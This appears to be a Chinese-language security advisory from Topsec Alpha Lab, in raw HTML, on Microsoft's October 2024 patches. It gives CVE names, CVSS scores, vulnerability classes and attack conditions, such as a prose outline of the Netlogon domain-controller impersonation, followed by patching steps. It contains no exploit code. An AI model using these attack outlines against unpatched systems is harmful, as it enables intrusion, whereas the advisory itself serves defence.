solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-43572</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Microsoft Management Console远程代码执行漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.8/7.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-43573</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows MSHTML平台欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">6.5/6.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-20659</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">Windows Hyper-V安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">7.1/6.6</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-43583</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Winlogon本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">7.8/6.8</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43572：Microsoft Management Console远程代码执行漏洞</span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已发现在野利用。此漏洞是Microsoft Management Console中的对消息或数据结构的处理不当漏洞（CWE-707）。未经身份认证的远程攻击者说服受害者下载特制的Microsoft保存的控制台(MSC)文件并打开它来利用此漏洞。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43573：Windows MSHTML平台欺骗漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已发现在野利用。此漏洞是Windows MSHTML平台中的XSS漏洞（CWE-79）。未经身份认证的远程攻击者说服受害者访问特制的链接来利用此漏洞。成功利用此漏洞的攻击者可以在用户浏览器中执行任意HTML和脚本代码。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-20659：Windows Hyper-V安全功能绕过漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已被公开披露。此漏洞是Windows Hyper-V中的不正确输入验证漏洞（CWE-20）。未经身份认证的局域网攻击者通过向目标系统发送特制的数据包来利用此漏洞。成功利用此漏洞的攻击者可以绕过UEFI，这可能导致虚拟机管理程序和安全内核受到损坏。攻击者要成功利用此漏洞，需要用户重新启动其机器。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43583：Winlogon本地权限提升漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已被公开披露且利用可能性较大。此漏洞是Windows Winlogon组件中的以不必要的权限执行漏洞（CWE-250）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43502</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.1/6.2</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43509</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43556</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43560</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Storage Port驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43581</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows OpenSSH远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.1/6.2</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43615</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows OpenSSH远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.1/6.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43609</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Office欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">6.5/5.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43502：Windows Kernel本地权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows Kernel中的使用未初始化资源漏洞（CWE-908）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。此漏洞允许攻击者泄露内核信息或使服务不可用，但不允许攻击者修改任何数据。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43509、CVE-2024-43556：Windows图形组件本地权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞都是Windows图形组件中的释放后重用UAF漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43560：Windows Storage Port驱动本地权限提升漏洞</span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows Storage Port驱动中的堆溢出漏洞（CWE-122）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43581、CVE-2024-43615：Windows OpenSSH远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">这些漏洞都是Windows OpenSSH中的文件名或路径的外部控制漏洞（CWE-73）。成功利用这些漏洞需要攻击者能够访问目标文件运行的位置，然后植入一个特定文件，用于漏洞利用；且需要诱导受害者执行特定的文件管理操作来触发漏洞。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43609：Microsoft Office欺骗漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Microsoft Office中的将敏感信息暴露给未经授权的行为者漏洞（CWE-200）。未经授权的远程攻击者将一个特制文件托管在网站或服务器上，并诱导受害者单击网站链接打开该特制文件来利用此漏洞。</span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43468</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Configuration Manager远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.8/8.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38124</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Netlogon权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.0/7.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43533</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Remote Desktop Client远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43607</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43468：Microsoft Configuration Manager远程代码执行漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">此漏洞是Microsoft Configuration Manager中的SQL注入漏洞（CWE-89）。未经身份认证的远程攻击者通过向目标环境发送特制的请求来利用此漏洞，这些请求以不安全的方式处理，从而使攻击者能够在服务器或底层数据库上执行命令。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38124：Windows Netlogon权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows Netlogon中的不正确身份认证漏洞（CWE-287）。经过身份认证的局域网攻击者需要预测新域控制器的名称，并重命名其计算机以匹配该名称；然后，他们将建立一个安全通道并保持其活动状态，同时将计算机重命名回其原始名称。一旦新的域控制器被提升，攻击者就可以使用安全通道冒充域控制器并可能危及整个域。成功利用此漏洞的攻击者可以获得域管理员权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="text-indent: 0em;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43533：Remote Desktop Client远程代码执行漏洞</span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">此漏洞是Remote Desktop Client中的释放后重用UAF漏洞（CWE-416）。受害者使用存在漏洞的RDP客户端连接到恶意服务器时，控制远程桌面服务器的攻击者可以在RDP客户端计算机上触发远程代码执行。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">CVE-2024-43607：Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">此漏洞是Windows路由和远程访问服务(RRAS)中的堆溢出漏洞（CWE-122）。未经身份认证的远程攻击者可以向路由和远程访问服务(RRAS)服务器发送特制的协议消息，这可能导致在RAS服务器上的执行任意代码。利用此漏洞需要客户端上的管理员用户连接到恶意服务器，这可能允许攻击者在客户端上执行代码。</span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的10月补丁并安装：</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Oct</a></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft 